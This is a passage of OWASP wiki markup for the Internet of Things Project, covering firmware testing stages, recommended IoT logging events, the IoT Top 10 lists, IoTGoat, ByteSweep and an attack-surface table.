The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relative technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Attain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}The full methodology release can be downloaded via the following TBD. <br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255832OWASP Internet of Things Project2019-10-31T14:49:56Z<p>Aaron.guzman: FSTM</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides, Tools, and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
